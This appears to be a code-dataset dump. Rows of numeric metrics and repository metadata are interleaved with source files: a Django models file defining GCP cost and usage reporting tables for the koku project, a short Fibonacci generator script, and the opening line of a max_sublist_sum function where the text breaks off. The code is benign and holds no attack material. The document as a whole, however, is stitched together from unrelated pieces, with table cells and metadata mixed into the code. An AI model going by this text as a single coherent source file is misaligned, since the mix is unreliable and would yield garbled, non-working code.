| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.026549
| 0
| 0.026549
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
b71001480f941cb198b817d674f01171403b0eda
| 33,288
|
py
|
Python
|
koku/reporting/provider/gcp/models.py
|
bsquizz/koku
|
386dd6ca4a4fd1b50790a929acc81d2dc245a91c
|
[
"Apache-2.0"
] | null | null | null |
koku/reporting/provider/gcp/models.py
|
bsquizz/koku
|
386dd6ca4a4fd1b50790a929acc81d2dc245a91c
|
[
"Apache-2.0"
] | null | null | null |
koku/reporting/provider/gcp/models.py
|
bsquizz/koku
|
386dd6ca4a4fd1b50790a929acc81d2dc245a91c
|
[
"Apache-2.0"
] | null | null | null |
#
# Copyright 2021 Red Hat Inc.
# SPDX-License-Identifier: Apache-2.0
#
"""Models for GCP cost and usage entry tables."""
from uuid import uuid4
from django.contrib.postgres.fields import ArrayField
from django.contrib.postgres.indexes import GinIndex
from django.db import models
from django.db.models import JSONField
PRESTO_LINE_ITEM_DAILY_TABLE = "gcp_line_items_daily"
PRESTO_LINE_ITEM_TABLE = "gcp_line_items"
UI_SUMMARY_TABLES = (
"reporting_gcp_cost_summary_p",
"reporting_gcp_cost_summary_by_account_p",
"reporting_gcp_cost_summary_by_project_p",
"reporting_gcp_cost_summary_by_region_p",
"reporting_gcp_cost_summary_by_service_p",
"reporting_gcp_compute_summary_p",
"reporting_gcp_compute_summary_by_account_p",
"reporting_gcp_storage_summary_p",
"reporting_gcp_storage_summary_by_project_p",
"reporting_gcp_storage_summary_by_service_p",
"reporting_gcp_storage_summary_by_account_p",
"reporting_gcp_storage_summary_by_region_p",
"reporting_gcp_network_summary_p",
"reporting_gcp_database_summary_p",
)
class GCPCostEntryBill(models.Model):
"""The billing information for a Cost Usage Report.
The billing period (1 month) will cover many cost entries.
"""
class Meta:
"""Meta for GCPCostEntryBill."""
unique_together = ("billing_period_start", "provider")
billing_period_start = models.DateTimeField()
billing_period_end = models.DateTimeField()
summary_data_creation_datetime = models.DateTimeField(null=True, blank=True)
summary_data_updated_datetime = models.DateTimeField(null=True, blank=True)
finalized_datetime = models.DateTimeField(null=True, blank=True)
derived_cost_datetime = models.DateTimeField(null=True, blank=True)
provider = models.ForeignKey("api.Provider", on_delete=models.CASCADE)
class GCPProject(models.Model):
"""The per Project information for GCP."""
account_id = models.CharField(max_length=20)
project_id = models.CharField(unique=True, max_length=256)
project_name = models.CharField(max_length=256)
project_labels = models.CharField(max_length=256, null=True, blank=True)
class GCPCostEntryProductService(models.Model):
"""The product service and sku information."""
class Meta:
"""Meta for GCPCostEntryProductService."""
unique_together = ("service_id", "service_alias", "sku_id", "sku_alias")
db_table = "reporting_gcpcostentryproductservice"
id = models.BigAutoField(primary_key=True)
service_id = models.CharField(max_length=256, null=True)
service_alias = models.CharField(max_length=256, null=True, blank=True)
sku_id = models.CharField(max_length=256, null=True)
sku_alias = models.CharField(max_length=256, null=True)
class GCPCostEntryLineItem(models.Model):
"""GCP cost entry daily line item."""
class Meta:
"""Meta for GCPCostEntryLineItem."""
db_table = "reporting_gcpcostentrylineitem"
id = models.BigAutoField(primary_key=True)
usage_start = models.DateTimeField()
usage_end = models.DateTimeField()
partition_date = models.DateTimeField(null=True)
tags = JSONField(null=True)
usage_type = models.CharField(max_length=50, null=True)
location = models.CharField(max_length=256, null=True, blank=True)
country = models.CharField(max_length=256, null=True, blank=True)
region = models.CharField(max_length=256, null=True, blank=True)
zone = models.CharField(max_length=256, null=True, blank=True)
export_time = models.CharField(max_length=256, null=True, blank=True)
cost = models.DecimalField(max_digits=24, decimal_places=9, null=True, blank=True)
currency = models.CharField(max_length=256, null=True, blank=True)
conversion_rate = models.CharField(max_length=256, null=True, blank=True)
usage_to_pricing_units = models.DecimalField(max_digits=24, decimal_places=9, null=True)
usage_pricing_unit = models.CharField(max_length=256, null=True, blank=True)
credits = models.CharField(max_length=256, null=True, blank=True)
invoice_month = models.CharField(max_length=256, null=True, blank=True)
cost_type = models.CharField(max_length=256, null=True, blank=True)
line_item_type = models.CharField(max_length=256, null=True)
cost_entry_product = models.ForeignKey(
GCPCostEntryProductService, null=True, on_delete=models.CASCADE, db_constraint=False
)
cost_entry_bill = models.ForeignKey(GCPCostEntryBill, on_delete=models.CASCADE, db_constraint=False)
project = models.ForeignKey(GCPProject, on_delete=models.CASCADE, db_constraint=False)
class GCPCostEntryLineItemDaily(models.Model):
"""GCP cost entry daily line item."""
class Meta:
"""Meta for GCPCostEntryLineItem."""
db_table = "reporting_gcpcostentrylineitem_daily"
indexes = [
models.Index(fields=["usage_start"], name="gcp_usage_start_idx"),
GinIndex(fields=["tags"], name="gcp_cost_entry"),
]
id = models.BigAutoField(primary_key=True)
cost_entry_bill = models.ForeignKey(GCPCostEntryBill, on_delete=models.CASCADE)
cost_entry_product = models.ForeignKey(GCPCostEntryProductService, null=True, on_delete=models.CASCADE)
project = models.ForeignKey(GCPProject, on_delete=models.CASCADE)
line_item_type = models.CharField(max_length=256, null=True)
usage_start = models.DateField(null=False)
usage_end = models.DateField(null=True)
tags = JSONField(null=True)
usage_type = models.CharField(max_length=50, null=True)
region = models.CharField(max_length=256, null=True, blank=True)
cost = models.DecimalField(max_digits=24, decimal_places=9, null=True, blank=True)
currency = models.CharField(max_length=256, null=True, blank=True)
conversion_rate = models.CharField(max_length=256, null=True, blank=True)
usage_in_pricing_units = models.DecimalField(max_digits=24, decimal_places=9, null=True)
usage_pricing_unit = models.CharField(max_length=256, null=True, blank=True)
invoice_month = models.CharField(max_length=256, null=True, blank=True)
tax_type = models.CharField(max_length=256, null=True, blank=True)
credit_amount = models.DecimalField(max_digits=24, decimal_places=9, null=True, blank=True)
class GCPCostEntryLineItemDailySummary(models.Model):
"""A daily aggregation of line items.
This table is aggregated by service, and does not
have a breakdown by resource or tags. The contents of this table
should be considered ephemeral. It will be regularly deleted from
and repopulated.
"""
class PartitionInfo:
partition_type = "RANGE"
partition_cols = ["usage_start"]
class Meta:
"""Meta for GCPCostEntryLineItemDailySummary."""
db_table = "reporting_gcpcostentrylineitem_daily_summary"
indexes = [
models.Index(fields=["usage_start"], name="gcp_summary_usage_start_idx"),
models.Index(fields=["instance_type"], name="gcp_summary_instance_type_idx"),
GinIndex(fields=["tags"], name="gcp_tags_idx"),
models.Index(fields=["project_id"], name="gcp_summary_project_id_idx"),
models.Index(fields=["project_name"], name="gcp_summary_project_name_idx"),
models.Index(fields=["service_id"], name="gcp_summary_service_id_idx"),
models.Index(fields=["service_alias"], name="gcp_summary_service_alias_idx"),
]
uuid = models.UUIDField(primary_key=True)
cost_entry_bill = models.ForeignKey(GCPCostEntryBill, on_delete=models.CASCADE)
# The following fields are used for grouping
account_id = models.CharField(max_length=20)
project_id = models.CharField(max_length=256)
project_name = models.CharField(max_length=256)
service_id = models.CharField(max_length=256, null=True)
service_alias = models.CharField(max_length=256, null=True, blank=True)
sku_id = models.CharField(max_length=256, null=True)
sku_alias = models.CharField(max_length=256, null=True)
usage_start = models.DateField(null=False)
usage_end = models.DateField(null=True)
region = models.CharField(max_length=50, null=True)
instance_type = models.CharField(max_length=50, null=True)
unit = models.CharField(max_length=63, null=True)
line_item_type = models.CharField(max_length=256, null=True)
usage_amount = models.DecimalField(max_digits=24, decimal_places=9, null=True)
currency = models.CharField(max_length=10)
invoice_month = models.CharField(max_length=256, null=True, blank=True)
# The following fields are aggregates
unblended_cost = models.DecimalField(max_digits=24, decimal_places=9, null=True)
markup_cost = models.DecimalField(max_digits=24, decimal_places=9, null=True)
tags = JSONField(null=True)
source_uuid = models.UUIDField(unique=False, null=True)
credit_amount = models.DecimalField(max_digits=24, decimal_places=9, null=True, blank=True)
class GCPEnabledTagKeys(models.Model):
"""A collection of the current enabled tag keys."""
class Meta:
"""Meta for GCPEnabledTagKeys."""
db_table = "reporting_gcpenabledtagkeys"
id = models.BigAutoField(primary_key=True)
key = models.CharField(max_length=253, unique=True)
class GCPTagsSummary(models.Model):
"""A collection of all current existing tag key and values."""
class Meta:
"""Meta for GCPTagSummary."""
db_table = "reporting_gcptags_summary"
unique_together = ("key", "cost_entry_bill", "account_id", "project_id", "project_name")
uuid = models.UUIDField(primary_key=True, default=uuid4)
key = models.TextField()
values = ArrayField(models.TextField())
cost_entry_bill = models.ForeignKey("GCPCostEntryBill", on_delete=models.CASCADE)
account_id = models.TextField(null=True)
project_id = models.TextField(null=True)
project_name = models.TextField(null=True)
class GCPTagsValues(models.Model):
class Meta:
"""Meta for GCPTagsValues."""
db_table = "reporting_gcptags_values"
unique_together = ("key", "value")
indexes = [models.Index(fields=["key"], name="gcp_tags_value_key_idx")]
uuid = models.UUIDField(primary_key=True, default=uuid4)
key = models.TextField()
value = models.TextField()
account_ids = ArrayField(models.TextField())
project_ids = ArrayField(models.TextField(), null=True)
project_names = ArrayField(models.TextField(), null=True)
class GCPTopology(models.Model):
"""GCPAccountTopology ORM model."""
class Meta:
"""Meta for GCPAccountTopology."""
db_table = "reporting_gcp_topology"
uuid = models.UUIDField(primary_key=True, default=uuid4)
source_uuid = models.UUIDField(unique=False, null=True)
account_id = models.TextField()
project_id = models.TextField()
project_name = models.TextField()
service_id = models.TextField()
service_alias = models.TextField()
region = models.TextField()
# ======================================================
# Partitioned Models to replace matviews
# ======================================================
class GCPCostSummaryP(models.Model):
"""A summarized partitioned table specifically for UI API queries.
This table gives a daily breakdown of total cost.
"""
class PartitionInfo:
partition_type = "RANGE"
partition_cols = ["usage_start"]
class Meta:
"""Meta for GCPCostSummaryP."""
db_table = "reporting_gcp_cost_summary_p"
indexes = [
models.Index(fields=["usage_start"], name="gcpcostsumm_usage_start"),
models.Index(fields=["invoice_month"], name="gcpcostsumm_invmonth"),
]
id = models.UUIDField(primary_key=True)
usage_start = models.DateField(null=False)
usage_end = models.DateField(null=False)
unblended_cost = models.DecimalField(max_digits=24, decimal_places=9, null=True)
markup_cost = models.DecimalField(max_digits=24, decimal_places=9, null=True)
currency = models.CharField(max_length=10)
source_uuid = models.ForeignKey(
"api.Provider", on_delete=models.CASCADE, unique=False, null=True, db_column="source_uuid"
)
invoice_month = models.CharField(max_length=256, null=True, blank=True)
credit_amount = models.DecimalField(max_digits=24, decimal_places=9, null=True, blank=True)
class GCPCostSummaryByAccountP(models.Model):
"""A summarized partitioned table specifically for UI API queries.
This table gives a daily breakdown of total cost by account.
"""
class PartitionInfo:
partition_type = "RANGE"
partition_cols = ["usage_start"]
class Meta:
"""Meta for GCPCostSummaryByAccountP."""
db_table = "reporting_gcp_cost_summary_by_account_p"
indexes = [
models.Index(fields=["usage_start"], name="gcpcostsumm_acc_usage_start"),
models.Index(fields=["account_id"], name="gcpcostsumm_acc_account_id"),
models.Index(fields=["invoice_month"], name="gcpcostsumm_acc_invmonth"),
]
id = models.UUIDField(primary_key=True)
usage_start = models.DateField(null=False)
usage_end = models.DateField(null=False)
account_id = models.CharField(max_length=50, null=False)
unblended_cost = models.DecimalField(max_digits=24, decimal_places=9, null=True)
markup_cost = models.DecimalField(max_digits=24, decimal_places=9, null=True)
currency = models.CharField(max_length=10)
source_uuid = models.ForeignKey(
"api.Provider", on_delete=models.CASCADE, unique=False, null=True, db_column="source_uuid"
)
invoice_month = models.CharField(max_length=256, null=True, blank=True)
credit_amount = models.DecimalField(max_digits=24, decimal_places=9, null=True, blank=True)
class GCPCostSummaryByProjectP(models.Model):
"""A summarized partitioned table specifically for UI API queries.
This table gives a daily breakdown of total cost by account.
"""
class PartitionInfo:
partition_type = "RANGE"
partition_cols = ["usage_start"]
class Meta:
"""Meta for GCPCostSummaryByProjectP."""
db_table = "reporting_gcp_cost_summary_by_project_p"
indexes = [
models.Index(fields=["usage_start"], name="gcpcostsumm_pro_usage_start"),
models.Index(fields=["project_id"], name="gcpcostsumm_pro_project_id"),
models.Index(fields=["invoice_month"], name="gcpcostsumm_pro_invmonth"),
]
id = models.UUIDField(primary_key=True)
usage_start = models.DateField(null=False)
usage_end = models.DateField(null=False)
unblended_cost = models.DecimalField(max_digits=24, decimal_places=9, null=True)
markup_cost = models.DecimalField(max_digits=24, decimal_places=9, null=True)
currency = models.CharField(max_length=10)
source_uuid = models.ForeignKey(
"api.Provider", on_delete=models.CASCADE, unique=False, null=True, db_column="source_uuid"
)
project_id = models.CharField(unique=False, max_length=256)
project_name = models.CharField(max_length=256)
account_id = models.CharField(max_length=50, null=False)
invoice_month = models.CharField(max_length=256, null=True, blank=True)
credit_amount = models.DecimalField(max_digits=24, decimal_places=9, null=True, blank=True)
class GCPCostSummaryByRegionP(models.Model):
"""A summarized partitioned table specifically for UI API queries.
This table gives a daily breakdown of total cost by region.
"""
class PartitionInfo:
partition_type = "RANGE"
partition_cols = ["usage_start"]
class Meta:
"""Meta for GCPCostSummaryByRegionP."""
db_table = "reporting_gcp_cost_summary_by_region_p"
indexes = [
models.Index(fields=["usage_start"], name="gcpcostsumm_reg_usage_start"),
models.Index(fields=["region"], name="gcpcostsumm_reg_region"),
models.Index(fields=["invoice_month"], name="gcpcostsumm_reg_invmonth"),
]
id = models.UUIDField(primary_key=True)
usage_start = models.DateField(null=False)
usage_end = models.DateField(null=False)
account_id = models.CharField(max_length=50, null=False)
region = models.CharField(max_length=50, null=True)
unblended_cost = models.DecimalField(max_digits=24, decimal_places=9, null=True)
markup_cost = models.DecimalField(max_digits=24, decimal_places=9, null=True)
currency = models.CharField(max_length=10)
source_uuid = models.ForeignKey(
"api.Provider", on_delete=models.CASCADE, unique=False, null=True, db_column="source_uuid"
)
invoice_month = models.CharField(max_length=256, null=True, blank=True)
credit_amount = models.DecimalField(max_digits=24, decimal_places=9, null=True, blank=True)
class GCPCostSummaryByServiceP(models.Model):
"""A summarized partitioned table specifically for UI API queries.
This table gives a daily breakdown of total cost by service.
"""
class PartitionInfo:
partition_type = "RANGE"
partition_cols = ["usage_start"]
class Meta:
"""Meta for GCPCostSummaryByServiceP."""
db_table = "reporting_gcp_cost_summary_by_service_p"
indexes = [
models.Index(fields=["usage_start"], name="gcpcostsumm_ser_usage_start"),
models.Index(fields=["service_id"], name="gcpcostsumm_ser_service_id"),
models.Index(fields=["invoice_month"], name="gcpcostsumm_ser_invmonth"),
]
id = models.UUIDField(primary_key=True)
usage_start = models.DateField(null=False)
usage_end = models.DateField(null=False)
account_id = models.CharField(max_length=50, null=False)
unblended_cost = models.DecimalField(max_digits=24, decimal_places=9, null=True)
markup_cost = models.DecimalField(max_digits=24, decimal_places=9, null=True)
currency = models.CharField(max_length=10)
source_uuid = models.ForeignKey(
"api.Provider", on_delete=models.CASCADE, unique=False, null=True, db_column="source_uuid"
)
service_id = models.CharField(max_length=256, null=True)
service_alias = models.CharField(max_length=256, null=True, blank=True)
invoice_month = models.CharField(max_length=256, null=True, blank=True)
credit_amount = models.DecimalField(max_digits=24, decimal_places=9, null=True, blank=True)
class GCPComputeSummaryP(models.Model):
"""A summarized partitioned table specifically for UI API queries.
This table gives a daily breakdown of compute usage.
"""
class PartitionInfo:
partition_type = "RANGE"
partition_cols = ["usage_start"]
class Meta:
"""Meta for GCPComputeSummaryP."""
db_table = "reporting_gcp_compute_summary_p"
indexes = [
models.Index(fields=["usage_start"], name="gcpcompsumm_usage_start"),
models.Index(fields=["instance_type"], name="gcpcompsumm_insttyp"),
models.Index(fields=["invoice_month"], name="gcpcompsumm_invmonth"),
]
id = models.UUIDField(primary_key=True)
usage_start = models.DateField(null=False)
usage_end = models.DateField(null=False)
instance_type = models.CharField(max_length=50, null=True)
usage_amount = models.DecimalField(max_digits=24, decimal_places=9, null=True)
unit = models.CharField(max_length=63, null=True)
unblended_cost = models.DecimalField(max_digits=24, decimal_places=9, null=True)
markup_cost = models.DecimalField(max_digits=24, decimal_places=9, null=True)
currency = models.CharField(max_length=10)
source_uuid = models.ForeignKey(
"api.Provider", on_delete=models.CASCADE, unique=False, null=True, db_column="source_uuid"
)
invoice_month = models.CharField(max_length=256, null=True, blank=True)
credit_amount = models.DecimalField(max_digits=24, decimal_places=9, null=True, blank=True)
class GCPComputeSummaryByAccountP(models.Model):
"""A summarized partitioned table specifically for UI API queries.
This table gives a daily breakdown of total cost by service and instance type.
"""
class PartitionInfo:
partition_type = "RANGE"
partition_cols = ["usage_start"]
class Meta:
"""Meta for GCPComputeSummaryByAccountP."""
db_table = "reporting_gcp_compute_summary_by_account_p"
indexes = [
models.Index(fields=["account_id"], name="gcpcompsumm_acc_account_id"),
models.Index(fields=["usage_start"], name="gcpcompsumm_acc_usage_start"),
models.Index(fields=["instance_type"], name="gcpcompsumm_acc_insttyp"),
models.Index(fields=["invoice_month"], name="gcpcompsumm_acc_invmonth"),
]
id = models.UUIDField(primary_key=True)
usage_start = models.DateField(null=False)
usage_end = models.DateField(null=False)
instance_type = models.CharField(max_length=50, null=True)
usage_amount = models.DecimalField(max_digits=24, decimal_places=9, null=True)
unit = models.CharField(max_length=63, null=True)
unblended_cost = models.DecimalField(max_digits=24, decimal_places=9, null=True)
markup_cost = models.DecimalField(max_digits=24, decimal_places=9, null=True)
currency = models.CharField(max_length=10)
source_uuid = models.ForeignKey(
"api.Provider", on_delete=models.CASCADE, unique=False, null=True, db_column="source_uuid"
)
account_id = models.CharField(max_length=50, null=False)
invoice_month = models.CharField(max_length=256, null=True, blank=True)
credit_amount = models.DecimalField(max_digits=24, decimal_places=9, null=True, blank=True)
class GCPStorageSummaryP(models.Model):
"""A summarized partitioned table specifically for UI API queries.
This table gives a daily breakdown of storage usage.
"""
class PartitionInfo:
partition_type = "RANGE"
partition_cols = ["usage_start"]
class Meta:
"""Meta for GCPStorageSummaryP."""
db_table = "reporting_gcp_storage_summary_p"
indexes = [
models.Index(fields=["usage_start"], name="gcpstorsumm_usage_start"),
models.Index(fields=["invoice_month"], name="gcpstorsumm_invmonth"),
]
id = models.UUIDField(primary_key=True)
usage_start = models.DateField(null=False)
usage_end = models.DateField(null=False)
usage_amount = models.DecimalField(max_digits=24, decimal_places=9, null=True)
unit = models.CharField(max_length=63, null=True)
unblended_cost = models.DecimalField(max_digits=24, decimal_places=9, null=True)
markup_cost = models.DecimalField(max_digits=24, decimal_places=9, null=True)
currency = models.CharField(max_length=10)
source_uuid = models.ForeignKey(
"api.Provider", on_delete=models.CASCADE, unique=False, null=True, db_column="source_uuid"
)
invoice_month = models.CharField(max_length=256, null=True, blank=True)
credit_amount = models.DecimalField(max_digits=24, decimal_places=9, null=True, blank=True)
class GCPStorageSummaryByProjectP(models.Model):
"""A summarized partitioned table specifically for UI API queries.
This table gives a daily breakdown of total cost by account.
"""
class PartitionInfo:
partition_type = "RANGE"
partition_cols = ["usage_start"]
class Meta:
"""Meta for GCPStorageSummaryByProjectP."""
db_table = "reporting_gcp_storage_summary_by_project_p"
indexes = [
models.Index(fields=["usage_start"], name="gcpstorsumm_pro_usage_start"),
models.Index(fields=["project_id"], name="gcpstorsumm_pro_project_id"),
models.Index(fields=["account_id"], name="gcpstorsumm_pro_account_id"),
models.Index(fields=["invoice_month"], name="gcpstorsumm_pro_invmonth"),
]
id = models.UUIDField(primary_key=True)
usage_start = models.DateField(null=False)
usage_end = models.DateField(null=False)
usage_amount = models.DecimalField(max_digits=24, decimal_places=9, null=True)
unit = models.CharField(max_length=63, null=True)
unblended_cost = models.DecimalField(max_digits=24, decimal_places=9, null=True)
markup_cost = models.DecimalField(max_digits=24, decimal_places=9, null=True)
currency = models.CharField(max_length=10)
source_uuid = models.ForeignKey(
"api.Provider", on_delete=models.CASCADE, unique=False, null=True, db_column="source_uuid"
)
project_id = models.CharField(unique=False, max_length=256)
project_name = models.CharField(max_length=256)
account_id = models.CharField(max_length=50, null=False)
invoice_month = models.CharField(max_length=256, null=True, blank=True)
credit_amount = models.DecimalField(max_digits=24, decimal_places=9, null=True, blank=True)
class GCPStorageSummaryByServiceP(models.Model):
"""A summarized partitioned table specifically for UI API queries.
This table gives a daily breakdown of compute usage by service and instance type.
"""
class PartitionInfo:
partition_type = "RANGE"
partition_cols = ["usage_start"]
class Meta:
"""Meta for GCPStorageSummaryByServiceP."""
db_table = "reporting_gcp_storage_summary_by_service_p"
indexes = [
models.Index(fields=["usage_start"], name="gcpstorsumm_ser_usage_start"),
models.Index(fields=["service_id"], name="gcpstorsumm_ser_service_id"),
models.Index(fields=["account_id"], name="gcpstorsumm_ser_account_id"),
models.Index(fields=["invoice_month"], name="gcpstorsumm_ser_invmonth"),
]
id = models.UUIDField(primary_key=True)
usage_start = models.DateField(null=False)
usage_end = models.DateField(null=False)
usage_amount = models.DecimalField(max_digits=24, decimal_places=9, null=True)
unit = models.CharField(max_length=63, null=True)
unblended_cost = models.DecimalField(max_digits=24, decimal_places=9, null=True)
markup_cost = models.DecimalField(max_digits=24, decimal_places=9, null=True)
currency = models.CharField(max_length=10)
source_uuid = models.ForeignKey(
"api.Provider", on_delete=models.CASCADE, unique=False, null=True, db_column="source_uuid"
)
service_id = models.CharField(max_length=256, null=True)
service_alias = models.CharField(max_length=256, null=True, blank=True)
account_id = models.CharField(max_length=50, null=False)
invoice_month = models.CharField(max_length=256, null=True, blank=True)
credit_amount = models.DecimalField(max_digits=24, decimal_places=9, null=True, blank=True)
class GCPStorageSummaryByAccountP(models.Model):
"""A summarized partitioned table specifically for UI API queries.
This table gives a daily breakdown of total cost by service and instance type.
"""
class PartitionInfo:
partition_type = "RANGE"
partition_cols = ["usage_start"]
class Meta:
"""Meta for GCPStorageSummaryByAccountP."""
db_table = "reporting_gcp_storage_summary_by_account_p"
indexes = [
models.Index(fields=["usage_start"], name="gcpstorsumm_acc_usage_start"),
models.Index(fields=["account_id"], name="gcpstorsumm_acc_account_id"),
models.Index(fields=["invoice_month"], name="gcpstorsumm_acc_invmonth"),
]
id = models.UUIDField(primary_key=True)
usage_start = models.DateField(null=False)
usage_end = models.DateField(null=False)
usage_amount = models.DecimalField(max_digits=24, decimal_places=9, null=True)
unit = models.CharField(max_length=63, null=True)
unblended_cost = models.DecimalField(max_digits=24, decimal_places=9, null=True)
markup_cost = models.DecimalField(max_digits=24, decimal_places=9, null=True)
currency = models.CharField(max_length=10)
source_uuid = models.ForeignKey(
"api.Provider", on_delete=models.CASCADE, unique=False, null=True, db_column="source_uuid"
)
account_id = models.CharField(max_length=50, null=False)
invoice_month = models.CharField(max_length=256, null=True, blank=True)
credit_amount = models.DecimalField(max_digits=24, decimal_places=9, null=True, blank=True)
class GCPStorageSummaryByRegionP(models.Model):
"""A summarized partitioned table specifically for UI API queries.
This table gives a daily breakdown of total cost by service and instance type.
"""
class PartitionInfo:
partition_type = "RANGE"
partition_cols = ["usage_start"]
class Meta:
"""Meta for GCPStorageSummaryByRegionP."""
db_table = "reporting_gcp_storage_summary_by_region_p"
indexes = [
models.Index(fields=["usage_start"], name="gcpstorsumm_reg_usage_start"),
models.Index(fields=["account_id"], name="gcpstorsumm_reg_account_id"),
models.Index(fields=["invoice_month"], name="gcpstorsumm_reg_invmonth"),
]
id = models.UUIDField(primary_key=True)
usage_start = models.DateField(null=False)
usage_end = models.DateField(null=False)
usage_amount = models.DecimalField(max_digits=24, decimal_places=9, null=True)
unit = models.CharField(max_length=63, null=True)
unblended_cost = models.DecimalField(max_digits=24, decimal_places=9, null=True)
markup_cost = models.DecimalField(max_digits=24, decimal_places=9, null=True)
currency = models.CharField(max_length=10)
source_uuid = models.ForeignKey(
"api.Provider", on_delete=models.CASCADE, unique=False, null=True, db_column="source_uuid"
)
account_id = models.CharField(max_length=50, null=False)
region = models.CharField(max_length=50, null=True)
invoice_month = models.CharField(max_length=256, null=True, blank=True)
credit_amount = models.DecimalField(max_digits=24, decimal_places=9, null=True, blank=True)
class GCPNetworkSummaryP(models.Model):
"""A MATERIALIZED VIEW specifically for UI API queries.
This table gives a daily breakdown of network usage.
"""
class PartitionInfo:
partition_type = "RANGE"
partition_cols = ["usage_start"]
class Meta:
"""Meta for GCPNetworkSummaryP."""
db_table = "reporting_gcp_network_summary_p"
indexes = [
models.Index(fields=["usage_start"], name="gcpnetsumm_usage_start"),
models.Index(fields=["invoice_month"], name="gcpnetsumm_invmonth"),
]
id = models.UUIDField(primary_key=True)
usage_start = models.DateField(null=False)
usage_end = models.DateField(null=False)
account_id = models.CharField(max_length=50, null=False)
usage_amount = models.DecimalField(max_digits=24, decimal_places=9, null=True)
unit = models.CharField(max_length=63, null=True)
unblended_cost = models.DecimalField(max_digits=24, decimal_places=9, null=True)
markup_cost = models.DecimalField(max_digits=24, decimal_places=9, null=True)
currency = models.CharField(max_length=10)
source_uuid = models.ForeignKey(
"api.Provider", on_delete=models.CASCADE, unique=False, null=True, db_column="source_uuid"
)
service_id = models.CharField(max_length=256, null=True)
service_alias = models.CharField(max_length=256, null=True, blank=True)
invoice_month = models.CharField(max_length=256, null=True, blank=True)
credit_amount = models.DecimalField(max_digits=24, decimal_places=9, null=True, blank=True)
class GCPDatabaseSummaryP(models.Model):
"""A MATERIALIZED VIEW specifically for UI API queries.
This table gives a daily breakdown of database usage.
"""
class PartitionInfo:
partition_type = "RANGE"
partition_cols = ["usage_start"]
class Meta:
"""Meta for GCPDatabaseSummaryP."""
db_table = "reporting_gcp_database_summary_p"
indexes = [
models.Index(fields=["usage_start"], name="gcpdbsumm_usage_start"),
models.Index(fields=["invoice_month"], name="gcpdbsumm_invmonth"),
]
id = models.UUIDField(primary_key=True)
usage_start = models.DateField(null=False)
usage_end = models.DateField(null=False)
account_id = models.CharField(max_length=50, null=False)
usage_amount = models.DecimalField(max_digits=24, decimal_places=9, null=True)
unit = models.CharField(max_length=63, null=True)
unblended_cost = models.DecimalField(max_digits=24, decimal_places=9, null=True)
markup_cost = models.DecimalField(max_digits=24, decimal_places=9, null=True)
currency = models.CharField(max_length=10)
source_uuid = models.ForeignKey(
"api.Provider", on_delete=models.CASCADE, unique=False, null=True, db_column="source_uuid"
)
service_id = models.CharField(max_length=256, null=True)
service_alias = models.CharField(max_length=256, null=True, blank=True)
invoice_month = models.CharField(max_length=256, null=True, blank=True)
credit_amount = models.DecimalField(max_digits=24, decimal_places=9, null=True, blank=True)
| 34.74739
| 107
| 0.714402
| 4,149
| 33,288
| 5.499879
| 0.056881
| 0.057145
| 0.082037
| 0.109383
| 0.857224
| 0.838074
| 0.812306
| 0.775669
| 0.731978
| 0.677725
| 0
| 0.016939
| 0.173546
| 33,288
| 957
| 108
| 34.783699
| 0.812511
| 0.104362
| 0
| 0.621212
| 0
| 0
| 0.129567
| 0.079631
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.00947
| 0
| 0.645833
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 7
|
b7142b0ef12c6a87be2402c1531270d92aeedce0
| 382
|
py
|
Python
|
00 - Quickly Look/Fibonacci/Fibonacci.py
|
whosramoss/Optimal-Coding-Solutions
|
2b507fab7174fe2d22bc8c153df70753c84ace7e
|
[
"MIT"
] | null | null | null |
00 - Quickly Look/Fibonacci/Fibonacci.py
|
whosramoss/Optimal-Coding-Solutions
|
2b507fab7174fe2d22bc8c153df70753c84ace7e
|
[
"MIT"
] | null | null | null |
00 - Quickly Look/Fibonacci/Fibonacci.py
|
whosramoss/Optimal-Coding-Solutions
|
2b507fab7174fe2d22bc8c153df70753c84ace7e
|
[
"MIT"
] | null | null | null |
# Python
def fib():
a, b = 1, 1
while True:
yield a
a, b = b, a + b
for index, x in enumerate(fib()):
if index == 10:
break
print("%s" % x),
# Python 3
def fib3():
a, b = 1, 1
while True:
yield a
a, b = b, a + b
for index, x in enumerate(fib()):
if index == 10:
break
print("{} ".format(x), end="")
| 16.608696
| 34
| 0.445026
| 60
| 382
| 2.833333
| 0.383333
| 0.070588
| 0.035294
| 0.047059
| 0.776471
| 0.776471
| 0.776471
| 0.776471
| 0.776471
| 0.776471
| 0
| 0.043103
| 0.39267
| 382
| 23
| 34
| 16.608696
| 0.689655
| 0.041885
| 0
| 0.777778
| 0
| 0
| 0.013736
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.111111
| true
| 0
| 0
| 0
| 0.111111
| 0.111111
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
b717485402b95034de64a33d52aecf589fb708cc
| 890
|
py
|
Python
|
correct_python_programs/max_sublist_sum.py
|
PatrickShaw/QuixBugs
|
5a2eb2987fdac12860b526ffa92a57e5831fd639
|
[
"MIT"
] | 22
|
2018-01-29T01:56:30.000Z
|
2022-03-21T12:25:40.000Z
|
correct_python_programs/max_sublist_sum.py
|
zixifan/QuixBugs
|
5a2eb2987fdac12860b526ffa92a57e5831fd639
|
[
"MIT"
] | 31
|
2017-12-18T21:04:34.000Z
|
2022-02-21T07:38:09.000Z
|
correct_python_programs/max_sublist_sum.py
|
zixifan/QuixBugs
|
5a2eb2987fdac12860b526ffa92a57e5831fd639
|
[
"MIT"
] | 19
|
2018-01-06T14:18:33.000Z
|
2022-03-21T12:25:43.000Z
|
def max_sublist_sum(arr):
